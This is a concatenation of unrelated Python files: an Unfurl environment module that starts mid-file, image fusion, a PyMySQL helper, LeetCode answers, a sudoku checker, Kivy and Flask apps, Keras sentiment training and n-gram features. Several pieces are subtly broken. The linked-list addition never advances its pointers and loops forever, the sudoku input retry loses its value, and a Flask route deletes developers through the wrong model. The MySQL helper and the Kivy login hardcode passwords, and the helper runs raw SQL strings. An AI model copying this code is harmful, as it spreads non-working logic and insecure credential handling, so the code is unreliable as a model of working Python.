localRepositories[repo.workingDir] = lock
else:
return False # no change
if not repo.isLocalOnly():
for name, val in self.projects.items():
if normalizeGitUrl(val["url"]) == normalizeGitUrl(repo.url):
break
else:
# if project isn't already in projects, use generated name
# XXX need to replace characters that don't match our namedObjects pattern manifest-schema.json
dirname, name = os.path.split(project.projectRoot)
if name == DefaultNames.ProjectDirectory:
name = os.path.basename(dirname)
counter = 0
while name in self.projects:
counter += 1
name += "-%s" % counter
externalProject = dict(
url=repo.url,
initial=repo.getInitialRevision(),
)
file = os.path.relpath(project.projectRoot, repo.workingDir)
if file and file != ".":
externalProject["file"] = file
self.projects[name] = externalProject
self.config.config.setdefault("projects", {})[name] = externalProject
if key:
self.config.saveInclude(key)
self.config.save()
return True
class LocalEnv(object):
"""
This class represents the local environment that an ensemble runs in, including
the local project it is part of and the home project.
"""
homeProject = None
def __init__(self, manifestPath=None, homePath=None, parent=None, project=None):
"""
If manifestPath is None find the first unfurl.yaml or ensemble.yaml
starting from the current directory.
If homepath is set it overrides UNFURL_HOME
(and an empty string disable the home path).
Otherwise the home path will be set to UNFURL_HOME or the default home location.
"""
import logging
logger = logging.getLogger("unfurl")
self.logger = logger
if parent:
self._projects = parent._projects
self._manifests = parent._manifests
self.homeConfigPath = parent.homeConfigPath
else:
self._projects = {}
if project:
self._projects[project.localConfig.config.path] = project
self._manifests = {}
self.homeConfigPath = getHomeConfigPath(homePath)
if self.homeConfigPath:
if not os.path.exists(self.homeConfigPath):
logger.warning(
'UNFURL_HOME is set but does not exist: "%s"', self.homeConfigPath
)
else:
self.homeProject = self.getProject(self.homeConfigPath, None)
if not self.homeProject:
logger.warning(
'Could not load home project at: "%s"', self.homeConfigPath
)
self.manifestPath = None
if manifestPath:
# if manifestPath does not exist check project config
manifestPath = os.path.abspath(manifestPath)
if not os.path.exists(manifestPath):
# XXX check if the manifest is named in the project config
# pathORproject = self.findProject(os.path.dirname(manifestPath))
# if pathORproject:
# self.manifestPath = pathORproject.getInstance(manifestPath)
# else:
raise UnfurlError(
"Ensemble manifest does not exist: '%s'" % manifestPath
)
else:
pathORproject = self.findManifestPath(manifestPath)
else:
# not specified: search current directory and parents for either a manifest or a project
pathORproject = self.searchForManifestOrProject(".")
if isinstance(pathORproject, Project):
self.project = pathORproject
if not self.manifestPath:
self.manifestPath = pathORproject.findDefaultInstanceManifest()
else:
self.manifestPath = pathORproject
if project:
self.project = project
else:
self.project = self.findProject(os.path.dirname(pathORproject))
self.toolVersions = {}
self.instanceRepo = self._getInstanceRepo()
self.config = (
self.project
and self.project.localConfig
or self.homeProject
and self.homeProject.localConfig
or LocalConfig()
)
def getVaultPassword(self, vaultId="default"):
secret = os.getenv("UNFURL_VAULT_%s_PASSWORD" % vaultId.upper())
if not secret:
context = self.getContext()
secret = (
context.get("secrets", {})
.get("attributes", {})
.get("vault_%s_password" % vaultId)
)
return secret
def getManifest(self, path=None):
from .yamlmanifest import YamlManifest
if path and path != self.manifestPath:
# share projects and ensembles
localEnv = LocalEnv(path, parent=self)
return localEnv.getManifest()
else:
manifest = self._manifests.get(self.manifestPath)
if not manifest:
vaultId = "default"
vault = makeVaultLib(self.getVaultPassword(vaultId), vaultId)
if vault:
self.logger.info(
"Vault password found, configuring vault id: %s", vaultId
)
manifest = YamlManifest(localEnv=self, vault=vault)
self._manifests[self.manifestPath] = manifest
return manifest
def getProject(self, path, homeProject):
path = Project.normalizePath(path)
project = self._projects.get(path)
if not project:
project = Project(path, homeProject)
self._projects[path] = project
return project
def getExternalManifest(self, location):
assert "project" in location
project = None
if self.project:
project = self.project.localConfig.projects.get(location["project"])
if not project and self.homeProject:
project = self.homeProject.localConfig.projects.get(location["project"])
if not project:
return None
repo = self.findGitRepo(project["url"])
if not repo:
return None
projectRoot = os.path.join(repo.workingDir, project.get("file") or "")
localEnv = LocalEnv(
os.path.join(projectRoot, location.get("file") or ""), parent=self
)
return localEnv.getManifest()
# manifestPath specified
# doesn't exist: error
# is a directory: either instance repo or a project
def findManifestPath(self, manifestPath):
if not os.path.exists(manifestPath):
raise UnfurlError(
"Manifest file does not exist: '%s'" % os.path.abspath(manifestPath)
)
if os.path.isdir(manifestPath):
test = os.path.join(manifestPath, DefaultNames.Ensemble)
if os.path.exists(test):
return test
else:
test = os.path.join(manifestPath, DefaultNames.LocalConfig)
if os.path.exists(test):
return self.getProject(test, self.homeProject)
else:
test = os.path.join(manifestPath, DefaultNames.ProjectDirectory)
if os.path.exists(test):
return self.getProject(test, self.homeProject)
else:
message = (
"Can't find an Unfurl ensemble or project in folder '%s'"
% manifestPath
)
raise UnfurlError(message)
else:
return manifestPath
def _getInstanceRepo(self):
instanceDir = os.path.dirname(self.manifestPath)
if self.project and instanceDir in self.project.workingDirs:
return self.project.workingDirs[instanceDir].repo
else:
return Repo.findContainingRepo(instanceDir)
def getRepos(self):
if self.project:
repos = self.project.getRepos()
else:
repos = []
if self.instanceRepo and self.instanceRepo not in repos:
return repos + [self.instanceRepo]
else:
return repos
def searchForManifestOrProject(self, dir):
current = os.path.abspath(dir)
while current and current != os.sep:
test = os.path.join(current, DefaultNames.Ensemble)
if os.path.exists(test):
return test
test = os.path.join(current, DefaultNames.LocalConfig)
if os.path.exists(test):
return self.getProject(test, self.homeProject)
test = os.path.join(current, DefaultNames.ProjectDirectory)
if os.path.exists(test):
return self.getProject(test, self.homeProject)
current = os.path.dirname(current)
message = "Can't find an Unfurl ensemble or project in the current directory (or any of the parent directories)"
raise UnfurlError(message)
def findProject(self, testPath):
"""
Walk parents looking for unfurl.yaml
"""
path = Project.findPath(testPath)
if path is not None:
return self.getProject(path, self.homeProject)
return None
def getContext(self, context=None):
"""
Return a new context that merges the given context with the local context.
"""
return self.config.getContext(self.manifestPath, context or {})
def getRuntime(self):
context = self.getContext()
runtime = context.get("runtime")
if runtime:
return runtime
if self.project and self.project.venv:
return "venv:" + self.project.venv
if self.homeProject and self.homeProject.venv:
return "venv:" + self.homeProject.venv
return None
def getLocalInstance(self, name, context):
assert name in ["locals", "secrets", "local", "secret"]
local = context.get(name, {})
return (
self.config.createLocalInstance(
name.rstrip("s"), local.get("attributes", {})
),
local,
)
def findGitRepo(self, repoURL, revision=None):
repo = None
if self.project:
repo = self.project.findGitRepo(repoURL, revision)
if not repo:
if self.homeProject:
return self.homeProject.findGitRepo(repoURL, revision)
return repo
def findOrCreateWorkingDir(self, repoURL, revision=None, basepath=None):
repo = self.findGitRepo(repoURL, revision)
# git-local repos must already exist
if not repo and not repoURL.startswith("git-local://"):
if self.project and (
basepath is None or self.project.isPathInProject(basepath)
):
project = self.project
else:
project = self.homeProject
if project:
repo = project.createWorkingDir(repoURL, revision)
if not repo:
return None, None, None
if revision:
# bare if HEAD isn't at the requested revision
bare = repo.revision != repo.resolveRevSpec(revision)
return repo, repo.revision, bare
else:
return repo, repo.revision, False
def findPathInRepos(self, path, importLoader=None):
"""If the given path is part of the working directory of a git repository
return that repository and a path relative to it"""
# importloader is unused until pinned revisions are supported
if self.instanceRepo:
repo = self.instanceRepo
filePath = repo.findRepoPath(path)
if filePath is not None:
return repo, filePath, repo.revision, False
candidate = None
repo = None
if self.project:
repo, filePath, revision, bare = self.project.findPathInRepos(
path, importLoader
)
if repo:
if not bare:
return repo, filePath, revision, bare
else:
candidate = (repo, filePath, revision, bare)
if self.homeProject:
repo, filePath, revision, bare = self.homeProject.findPathInRepos(
path, importLoader
)
if repo:
if bare and candidate:
return candidate
else:
return repo, filePath, revision, bare
return None, None, None, None
def mapValue(self, val):
"""
Evaluate using project home as a base dir.
"""
from .runtime import NodeInstance
from .eval import mapValue
instance = NodeInstance()
instance._baseDir = self.config.config.getBaseDir()
return mapValue(val, instance)
def getPaths(self):
paths = []
asdfDataDir = os.getenv("ASDF_DATA_DIR")
if not asdfDataDir:
# check if an ensemble previously installed asdf via git
repo = self.findGitRepo("https://github.com/asdf-vm/asdf.git/")
if repo:
asdfDataDir = repo.workingDir
else:
homeAsdf = os.path.expanduser("~/.asdf")
if os.path.isdir(homeAsdf):
asdfDataDir = homeAsdf
if asdfDataDir:
# project has higher priority over home project
if self.project:
paths = self.project.getAsdfPaths(asdfDataDir, self.toolVersions)
if self.homeProject:
paths += self.homeProject.getAsdfPaths(asdfDataDir, self.toolVersions)
return paths
|
# -*- coding: utf-8 -*-
import importlib.util
spec = importlib.util.spec_from_file_location("piepompt.part", "/home/markl/.config/pieprompt/hipart.py")
foo = importlib.util.module_from_spec(spec)
spec.loader.exec_module(foo)
|
import numpy as np
import cv2
from scipy.ndimage.filters import convolve
from scipy.spatial.distance import cdist
from cv2.ximgproc import guidedFilter
def Guided(I, p, r, eps):
return guidedFilter(I, p, r, eps)
def GuidedOptimize(G, P, r, eps):
N = len(G)
W = []
for i in range(N):
# MOST COSTLY OPERATION IN THE WHOLE THING
W.append(Guided(G[i].astype(np.float32), P[i].astype(np.float32), r, eps))
W = np.dstack(W) + 1e-12
W = W / W.sum(axis=2, keepdims=True)
return W
def SalWeights(G):
N = len(G)
W = []
for i in range(N):
W.append(saliency(G[i]))
W = np.dstack(W) + 1e-12
W = W / W.sum(axis=2, keepdims=True)
return W
D = cdist(np.arange(256)[:,None], np.arange(256)[:,None], 'euclidean')
def saliency(img):
global D
hist = np.bincount(img.flatten(), minlength=256) / img.size
sal_tab = np.dot(hist, D)
z = sal_tab[img]
return z
def FuseWeights(G, W):
return np.sum(np.dstack(G)*W, axis=2)
|
import pymysql
from logger import Logger
class PyMQLHelper:
"""
PyMySQL帮助类
"""
def __init__(self, db_address: str, db_username: str, db_password: str, db_name: str):
try:
self.__connection = pymysql.connect(db_address,
db_username,
db_password,
db_name)
self.__logger = Logger()
"""日志对象"""
except Exception as e:
self.__logger.debug(e)
def create_table(self, sql: str):
"""
创建数据表
关键词 with 语句可以保证诸如文件之类的对象在使用完之后一定会正确的执行其清理方法
:param sql 创建数据表的SQL语句
:type sql str
"""
if self.__connection is None:
return
try:
with self.__connection.cursor() as cursor:
cursor.execute(sql)
except Exception as e:
self.__logger.debug(e)
finally:
self.__connection.close()
def execute_operation(self, sql: str):
"""
插入、删除、更新数据
:param sql 插入、删除、更新SQL语句
:type sql str
:return true 操作成功;false 操作失败
"""
if self.__connection is None:
return False
try:
with self.__connection.cursor() as cursor:
cursor.execute(sql)
count = cursor.rowcount
self.__connection.commit()
if count == 1:
return True
else:
return False
except Exception as e:
self.__connection.rollback()
self.__logger.debug(e)
finally:
self.__connection.close()
def get_all(self, sql: str):
"""
获取符合条件的全部数据
:param sql 查询SQL语句
:type sql str
"""
if self.__connection is None:
return None
try:
with self.__connection.cursor() as cursor:
cursor.execute(sql)
# 获取所有记录列表
results = cursor.fetchall()
return results
except Exception as e:
self.__logger.debug(e)
finally:
self.__connection.close()
def get_one(self, sql: str):
"""
获取符合条件的一条数据
:param sql 查询SQL语句
:type sql str
"""
if self.__connection is None:
return None
try:
with self.__connection.cursor() as cursor:
cursor.execute(sql)
# 获取一条记录
result = cursor.fetchone()
return result
except Exception as e:
self.__logger.debug(e)
finally:
self.__connection.close()
if __name__ == '__main__':
helper = PyMQLHelper('localhost', 'root', '123456', 'pythontest')
helper.get_all('SELECT * FROM employee')
|
# -*- coding: utf-8 -*-
import itertools
from typing import List
class Solution:
def runningSum(self, nums: List[int]) -> List[int]:
return list(itertools.accumulate(nums))
if __name__ == "__main__":
solution = Solution()
assert [1, 3, 6, 10] == solution.runningSum([1, 2, 3, 4])
assert [1, 2, 3, 4, 5] == solution.runningSum([1, 1, 1, 1, 1])
assert [3, 4, 6, 16, 17] == solution.runningSum([3, 1, 2, 10, 1])
|
#!/usr/bin/python3
name = input("hello please input your name:")
print("hello",":"+name)
|
from time import sleep
def rowinput(row): # Inputting rows. Invoked in sudinput().
try:
rowlist = [int(i) for i in str(row)]
assert len(rowlist) == 9
return rowlist
except:
rowinput(input("Invalid input. Try again: "))
def sudinput(): # Creation of 9 rows and a matrix
global row1, row2, row3, row4, row5, row6, row7, row8, row9, megarow
row1 = rowinput(input("Enter row 1: "))
row2 = rowinput(input("Enter row 2: "))
row3 = rowinput(input("Enter row 3: "))
row4 = rowinput(input("Enter row 4: "))
row5 = rowinput(input("Enter row 5: "))
row6 = rowinput(input("Enter row 6: "))
row7 = rowinput(input("Enter row 7: "))
row8 = rowinput(input("Enter row 8: "))
row9 = rowinput(input("Enter row 9: "))
megarow = [row1, row2, row3, row4, row5, row6, row7, row8, row9]
def checkrows(row): # Checking a row
for i in range(1,10):
if i not in row:
return False
return True
def checkcols(): #Checking columns
column = []
for i in range(9):
for row in megarow:
column.append(row[i])
for i in range(1,10):
if i not in column:
return False
column = []
return True
def checksqrs(): #Checking squares
sqr1 = row1[:3] + row2[:3] + row3[:3]
sqr2 = row1[3:6] + row2[3:6] + row3[3:6]
sqr3 = row1[6:] + row2[6:] + row3[6:]
sqr4 = row4[:3] + row5[:3] + row6[:3]
sqr5 = row4[3:6] + row5[3:6] + row6[3:6]
sqr6 = row4[6:] + row5[6:] + row6[6:]
sqr7 = row7[:3] + row8[:3] + row9[:3]
sqr8 = row7[3:6] + row8[3:6] + row9[3:6]
sqr9 = row7[6:] + row8[6:] + row9[6:]
megalist = [sqr1, sqr2, sqr3, sqr4, sqr5, sqr6, sqr7, sqr8, sqr9]
for sqr in megalist:
for i in range(1, 10):
if i not in sqr:
return False
return True
###########Start of the actual script###########
sudinput()
for row in megarow:
if checkrows(row) == False:
row_check = False
break
row_check = True
col_check = checkcols()
sqr_check = checksqrs()
if row_check == True and col_check == True and sqr_check == True:
print("Yes")
else:
print("No")
if row_check == False:
print("Row check failed.")
if col_check == False:
print("Column check failed.")
if sqr_check == False:
print("Square check failed.")
close = input("Press any key to exit.")
|
#!/usr/bin/python
import sys
import codecs
from pyarmory import char
# usage
if len(sys.argv) < 3:
print sys.argv[0] + " [zone] [realm] [character name]"
print
print "Example: " + sys.argv[0] + " eu Zuluhed Ixell"
exit()
# open output file rep.<region>.<realm>.<char>.py
filename = "rep." + sys.argv[1] + "." + sys.argv[2] + "." + sys.argv[3] + ".py"
f = codecs.open(filename, encoding='utf-8', mode='w')
f.write("# faction, score, level\n")
f.write("rep = {\n")
reps = char.getReputation(sys.argv[1], sys.argv[2], sys.argv[3])
for k,v in reps.items():
f.write("\"" + k + "\": " + v.__str__() + ",\n")
f.write("}\n")
|
#Enhancement
import cv2
img=cv2.imread('sal.png')
clahe=cv2.createCLAHE
t=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
cv2.imshow('save.png',t)
if cv2.waitKey(0) & 0xFF == ord('q'):
cv2.destroyAllWindows()
|
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
class AnmeldenWindow(BoxLayout):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def validate_user(self):
user = self.ids.username_field
pwd = self.ids.pwd_field
info = self.ids.info
uname = user.text
passw = pwd.text
if uname == '' or passw == '':
info.text = '[color=#FF0000]Benutzername und/oder Passwort benötigt.[/color]'
else:
if uname == 'levin' and passw == '12345':
info.text = '[color=#00FF00]Erfolgreich eingeloggt.[/color]'
else:
info.text = '[color=#FF0000]Benutzername und/oder Passwort ungültig.[/color]'
class AnmeldenApp(App):
def build(self):
return AnmeldenWindow()
if __name__=="__main__":
sa = AnmeldenApp()
sa.run()
|
#Write a Python program to convert temperatures to and from celsius, fahrenheit. Go to the editor
#[ Formula : c/5 = (f-32)/9 [ where c = temperature in celsius and f = temperature in fahrenheit ]
#Expected Output :
#60°C is 140 in Fahrenheit
#45°F is 7 in Celsius
#32 + 9*c/5 = f
c = 60
f = 32 + 9 * c/5
print(f)
#fah = c / 5
#cel = f - 32/9
#print(fah)
#where c = temperature in celsius and f = temperature in fahrenheit
|
from django.conf.urls import url, include
from django.urls import path
from rest_framework.routers import DefaultRouter
from .views import FileUploadAPIView, FileUploadOldVersionAPIView
urlpatterns = [
# --Общая характеристика
path('api/isu_v1/upload/csv/', FileUploadOldVersionAPIView.as_view()),
]
|
import time
import numpy as np
import matplotlib.pyplot as plt
import scipy
import predictionData
import functions
test_x = predictionData.inputData[:, 4000:4600]
test_y = predictionData.outputData[:, 4000:4600]
print(np.shape(test_y))
initial_val = test_x[:, 1]
def MovingAverage(inputArray):
#weights = np.array([1.0/21, 2.0/21, 3.0/21, 4.0/21, 5.0/21, 6.0/21])
#inputArray = np.multiply(inputArray, weights)
return np.average(inputArray)
predict_y = []
inputArray = initial_val
print(inputArray)
for i in range(0, np.shape(test_x)[1]):
print(inputArray)
y = MovingAverage(test_x[:, i:i+1])
#inputArray = np.append(inputArray[1:], y)
predict_y.append(y)
cost = functions.compute_cost(predict_y, test_y)
averageError = functions.averageError(predict_y, test_y)
print(cost)
print(averageError)
|
import os
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
import numpy as np
from keras.models import Sequential
from keras.layers import Embedding, Flatten, Dense, LSTM, Dropout
from keras import layers
import pickle
from myUtility import preprocessImdb
maxlen = 500 # We will cut reviews after 100 words
training_samples = 20000 # We will be training on 200 samples
validation_samples = 5000 # We will be validating on 10000 samples
max_words =10000 # We will only consider the top 10,000 words in the dataset
#loading data and preproccing
imdb_dir = r'C:\Users\Osama\Downloads\DL Workspace\Data\aclImdb'
train_dir = os.path.join(imdb_dir, 'train')
word_index, x_train, y_train, x_val, y_val= preprocessImdb(train_dir, max_words, maxlen, IsValidationDataNeeded=True, trainingSamplesNo=training_samples, ValidationSamplesNo=validation_samples)
#import csv
#i=0
#with open('train.csv','w') as file:
# for text,label in zip(texts,labels):
# try:
# mylist=[]
# mylist.append(str(i))
# mylist.append(str(label))
# mylist.append('a')
# mylist.append(text)
#
# wr = csv.writer(file, quoting=csv.QUOTE_ALL)
# wr.writerow(mylist)
# i=i+1
# #print(text)
# except:
# continue
#
"""
import numpy as np
np.savetxt('x_train.txt', x_train)
np.savetxt('y_train.txt', y_train)
np.savetxt('x_val.txt', x_val)
np.savetxt('y_val.txt', y_val)
import numpy as np
x_train=np.loadtxt('/content/drive/My Drive/app/x_train.txt')
y_train=np.loadtxt('/content/drive/My Drive/app/y_train.txt')
x_val=np.loadtxt('/content/drive/My Drive/app/x_val.txt')
y_val=np.loadtxt('/content/drive/My Drive/app/y_val.txt')
"""
glove_dir = r'C:\Users\Osama\Downloads\DL Workspace\models'
embeddings_index = {}
f = open(os.path.join(glove_dir, 'glove.6B.300d.txt'), encoding="utf8")
for line in f:
try:
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
except:
continue
f.close()
print('Found %s word vectors.' % len(embeddings_index))
embedding_dim = 300
embedding_matrix = np.zeros((max_words, embedding_dim))
for word, i in word_index.items():
embedding_vector = embeddings_index.get(word)
if i < max_words:
if embedding_vector is not None:
# Words not found in embedding index will be all-zeros.
embedding_matrix[i] = embedding_vector
model = Sequential()
model.add(Embedding(max_words, embedding_dim, input_length=maxlen))
model.add(layers.Conv1D(32, 7, activation='relu'))
model.add(layers.MaxPooling1D(5))
model.add(layers.Conv1D(32, 7, activation='relu'))
model.add(layers.GlobalMaxPooling1D())
#model.add(LSTM(128, dropout=0.2, recurrent_dropout=0.2))
#model.add(Dropout(0.5))
model.add(Dense(1, activation='sigmoid'))
model.summary()
model.layers[0].set_weights([embedding_matrix])
#model.layers[0].trainable = False
model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['acc'])
history = model.fit(x_train, y_train,
epochs=4,
batch_size=128,
validation_data=(x_val, y_val))
model.save_weights('modelWeights.h5')
model.save('model.h5')
from myUtility import plotResults
plotResults(history)
test_dir = os.path.join(imdb_dir, 'test')
word_index, x_test, y_test= preprocessImdb(test_dir, max_words, maxlen)
#model.load_weights('modelWeights.h5')
model.evaluate(x_test, y_test)
#from keras.models import load_model
#myModel=load_model('preTrainedModel.h5')
#myModel.evaluate(x_test, y_test)
|
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def addTwoNumbers(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
# number one solution would be to reverse the lists
# but as it is noted in the description of the problem
# it is not allowed to modify the input
# the other way would be get the length of the smaller list
stack_1 = []
stack_2 = []
# put all numbers into stack from list 1
curr_1, curr_2 = l1, l2
while curr_1 and curr_2:
stack_1.append(curr_1.val)
stack_2.append(curr_2.val)
curr_1 = curr_1.next
curr_1 = curr_1.next
# add remaining node values to stack
if curr_1:
while curr_1:
stack_1.append(curr_1.val)
if curr_2:
while curr_2:
stack_2.append(curr_2.val)
power = 0
result = 0
while stack_1 and stack_2:
# pop the top of the stack
num_1 = stack_1.pop()
num_2 = stack_2.pop()
result += (num_1*(10**power) + num_2*(10**power))
# increment the power(of 10)
power += 1
if stack_1:
while stack_1:
num = stack_1.pop()
result += num*(10**power)
power += 1
if stack_2:
while stack_2:
num = stack_2.pop()
result += num*(10**power)
power += 1
result = str(result)
# build the linked list version of number
head = curr = ListNode(result[0])
for i in range(1, len(result)):
digit = result[i]
new_node = ListNode(digit)
curr.next = new_node
curr = new_node
return head
# def length(self, head):
# """
# Find the length of the given linked list
# """
|
"""Core middlewares."""
from django import http
from django.urls import reverse
from django.utils.deprecation import MiddlewareMixin
from . import models
class LocalConfigMiddleware(MiddlewareMixin):
"""A middleware to inject LocalConfig into request."""
def process_request(self, request):
"""Inject LocalConfig instance to request."""
request.localconfig = models.LocalConfig.objects.first()
class TwoFAMiddleware:
"""Custom 2FA middleware to enforce verification if user has TFA enabled."""
def __init__(self, get_response=None):
self.get_response = get_response
def __call__(self, request):
user = getattr(request, "user", None)
redirect_url = reverse("core:2fa_verify")
url_exceptions = (
redirect_url,
"/jsi18n/"
)
condition = (
user and
not user.is_anonymous and
user.tfa_enabled and
not request.path.startswith('/api/') and
request.path not in url_exceptions and
not user.is_verified()
)
if condition:
return http.HttpResponseRedirect(reverse("core:2fa_verify"))
return self.get_response(request)
|
"""
Logic for dashboard related routes
"""
from flask import Blueprint, render_template,redirect,url_for,flash
from .forms import LogUserForm, secti,masoform,TestForm,HryForm,VyvojarForm
from ..data.database import db
from ..data.models import LogUser,Emaily,Hry,Vyvojari
blueprint = Blueprint('public', __name__)
@blueprint.route('/', methods=['GET'])
def index():
return render_template('public/index.tmpl')
@blueprint.route('/loguserinput',methods=['GET', 'POST'])
def InsertLogUser():
form = LogUserForm()
if form.validate_on_submit():
LogUser.create(**form.data)
return render_template("public/LogUser.tmpl", form=form)
@blueprint.route('/loguserlist',methods=['GET'])
def ListuserLog():
pole = db.session.query(LogUser).all()
return render_template("public/listuser.tmpl",data = pole)
@blueprint.route('/secti', methods=['GET','POST'])
def scitani():
form = secti()
if form.validate_on_submit():
return render_template('public/vystup.tmpl',hod1=form.hodnota1.data,hod2=form.hodnota2.data,suma=form.hodnota1.data+form.hodnota2.data)
return render_template('public/secti.tmpl', form=form)
@blueprint.route('/maso', methods=['GET','POST'])
def masof():
form = masoform()
if form.validate_on_submit():
return render_template('public/masovystup.tmpl',hod1=form.hodnota1.data,hod2=form.hodnota2.data,suma=form.hodnota1.data+form.hodnota2.data)
return render_template('public/maso.tmpl', form=form)
@blueprint.route('/testForm', methods=['GET','POST'])
def Formular():
form = TestForm()
if form.validate_on_submit():
Emaily.create(**form.data)
flash("Ulozeno",category="INFO")
return render_template('public/testForm.tmpl', form=form)
@blueprint.route('/testList', methods=['GET'])
def FormularList():
pole = db.session.query(Emaily).all()
return render_template('public/testList.tmpl', pole=pole)
@blueprint.route('/smazEmail/<id>', methods=['GET'])
def FormularDel(id):
iddel = db.session.query(Emaily).filter_by(id=id).first()
Emaily.delete(iddel)
return redirect(url_for('public.FormularList'))
@blueprint.route('/hry', methods=['GET','POST'])
def FormularHry():
form = HryForm()
if form.validate_on_submit():
Hry.create(**form.data)
flash("Ulozeno",category="INFO")
return render_template('public/hryForm.tmpl', form=form)
@blueprint.route('/hryList', methods=['GET'])
def FormularHryList():
pole = db.session.query(Hry).all()
return render_template('public/hryList.tmpl', pole=pole)
@blueprint.route('/smazHru/<id>', methods=['GET'])
def FormularHryDel(id):
hra = db.session.query(Hry).filter_by(id=id).first()
Hry.delete(hra)
return redirect(url_for('public.FormularHryList'))
@blueprint.route('/upravHru/<id>', methods=['GET','POST'])
def FormularHryEdit(id):
hra = db.session.query(Hry).filter_by(id=id).first()
form=HryForm(obj=hra)
if form.validate_on_submit():
Hry.delete(hra)
Hry.create(**form.data)
return redirect(url_for('public.FormularHryList'))
return render_template("public/hryForm.tmpl", action="Edit", form=form)
@blueprint.route('/vyvojari', methods=['GET','POST'])
def FormularVyvojari():
form = VyvojarForm()
if form.validate_on_submit():
Vyvojari.create(**form.data)
flash("Ulozeno",category="INFO")
return render_template('public/vyvojarForm.tmpl', form=form)
@blueprint.route('/vyvojariList', methods=['GET'])
def FormularVyvojariList():
pole = db.session.query(Vyvojari).all()
return render_template('public/vyvojariList.tmpl', pole=pole)
@blueprint.route('/smazVyvojare/<id>', methods=['GET'])
def FormularVyvojariDel(id):
vyvojar = db.session.query(Vyvojari).filter_by(id=id).first()
Hry.delete(vyvojar)
return redirect(url_for('public.FormularVyvojariList'))
@blueprint.route('/upravVyvojare/<id>', methods=['GET','POST'])
def FormularVyvojariEdit(id):
vyvojar = db.session.query(Vyvojari).filter_by(id=id).first()
form=VyvojarForm(obj=vyvojar)
if form.validate_on_submit():
Vyvojari.delete(vyvojar)
Vyvojari.create(**form.data)
return redirect(url_for('public.FormularVyvojariList'))
return render_template("public/vyvojarForm.tmpl", action="Edit", form=form)
|
import unittest
'''test_dir="./tudou"
suits=unittest.defaultTestLoader.discover(test_dir,pattern="test*.py")
if __name__=="__main__":
runner=unittest.TextTestRunner()
runner.run(suits)'''
class Mytest(unittest.TestCase):
@unittest.skip
def test_skip(self):
print("aaa")
@unittest.skipIf(3>2,"条件为真跳过测试")
def test_skip_if(self):
print("bbb")
@unittest.skipUnless(2>3,"条件为真执行测试")
def test_skip_unless(self):
print("ccc")
@unittest.expectedFailure
def test_expected_failure(self):
self.assertEqual(2,3)
''' @classmethod
def tearDownClass(cls):
cls.driver,quit()'''
|
from collections import Counter
from nltk.tokenize import word_tokenize
import nltk
import itertools
import numpy as np
from syntatic.parsing import *
import cPickle as pickle
## Find unique tokens in the corpus and returns token dictionary
def create_unigram_tokens(corpus, corpus_frequencies_filename = None):
freqs = Counter(list(itertools.chain.from_iterable(corpus)))
tokens = map(lambda x:x[0],freqs.most_common())
ans = dict(zip(tokens, range(0,len(tokens)) ))
if corpus_frequencies_filename:
with open(corpus_frequencies_filename + '.txt','w') as freq_out:
for word in tokens:
freq_out.write((word + u' ' + str(freqs[word]) + u'\n').encode('utf-8'))
pickle.dump(ans, open(corpus_frequencies_filename + '.pickle', 'wb'))
return ans
def char_ngram_tokenizer(text,n=2):
tokens = word_tokenize(text)
return [b[i:i+n] for b in tokens for i in range(len(b)-(n-1))]
## Returns a ngram frequency vector with dimension 1 x | tokens |
def ngram_vectorize(tokenized_text,tok2id):
feat_vec = np.zeros(shape=(len(tok2id),1))
for word in tokenized_text:
if word in tok2id.keys():
feat_vec[tok2id[word]] += 1
return feat_vec.T
def extract_ngram_for_training(corpus_plain_text,tokenizer):
corpus = [ tokenizer( (text).encode('utf8').decode('utf8') ) for text in corpus_plain_text]
tokens2id = create_unigram_tokens(corpus)
feats = [ ngram_vectorize(text,tokens2id) for text in corpus]
return (np.vstack(feats), tokens2id)
def parse_corpus_for_training(corpus_plain_text):
corpus = [ extract_productions_triples_taggedsent( (text).encode('utf8').decode('utf8') ) for text in corpus_plain_text]
prods = [ item['prods'] for item in corpus ]
triples = [ item['triples'] for item in corpus ]
return (triples,prods)
def extract_syntatic_feats_for_training(parsed_corpus):
triples,prods = parsed_corpus
#corpus = [ extract_productions_triples_taggedsent( (text).encode('utf8').decode('utf8') ) for text in corpus_plain_text]
prod2id = create_unigram_tokens(corpus=[prod for prod in prods])
trip2id = create_unigram_tokens(corpus=[trip for trip in triples])
feats1 = [ngram_vectorize(prod,prod2id) for prod in prods]
feats2 = [ngram_vectorize(trip,trip2id) for trip in triples]
return(np.vstack(feats1),np.vstack(feats2))
def extract_bigram_for_training(corpus_plain_text):
return extract_ngram_for_training(corpus_plain_text,nltk.bigrams)
def extract_unigram_for_training(corpus_plain_text):
return extract_ngram_for_training(corpus_plain_text, word_tokenize)
def extract_char_bigram_for_training(corpus_plain_text):
return extract_ngram_for_training(corpus_plain_text,lambda x: char_ngram_tokenizer(x,n=2))
def extract_char_trigram_for_training(corpus_plain_text):
return extract_ngram_for_training(corpus_plain_text,lambda x: char_ngram_tokenizer(x,n=3))
## Used at run time to classify text
def extract_unigram(corpus_plain_text,unigramDict):
corpus = [ word_tokenize( (text).encode('utf8').decode('utf8') ) for text in corpus_plain_text]
feats = [ ngram_vectorize(text,unigramDict) for text in corpus]
return np.vstack(feats)
def extract_bigram(corpus_plain_text,bigramDict):
corpus = [ nltk.bigrams( (text).encode('utf8').decode('utf8') ) for text in corpus_plain_text]
feats = [ ngram_vectorize(text,bigramDict) for text in corpus]
return np.vstack(feats)
def extract_char_trigram(corpus_plain_text,chartrigramDict):
tokenizer = lambda x: char_ngram_tokenizer(x,n=3)
corpus = [ tokenizer( (text).encode('utf8').decode('utf8') ) for text in corpus_plain_text]
feats = [ ngram_vectorize(text,chartrigramDict) for text in corpus]
return np.vstack(feats)
|
# -*- coding: UTF-8 -*-
# 列表生成式 列表生成器里面可以用函数 yield
def f(n):
return n * n
print([f(x) for x in range(10)])
# 列表 元组等可以一次性取出赋值 a ,b , c = (1,2,3) 此时 a b c 三个值分别等于 1 2 3
|
# Implementation borrowed from https://github.com/gvishal/rank_text_cnn
# MAP and MRR metrics for learning to rank results evaluation
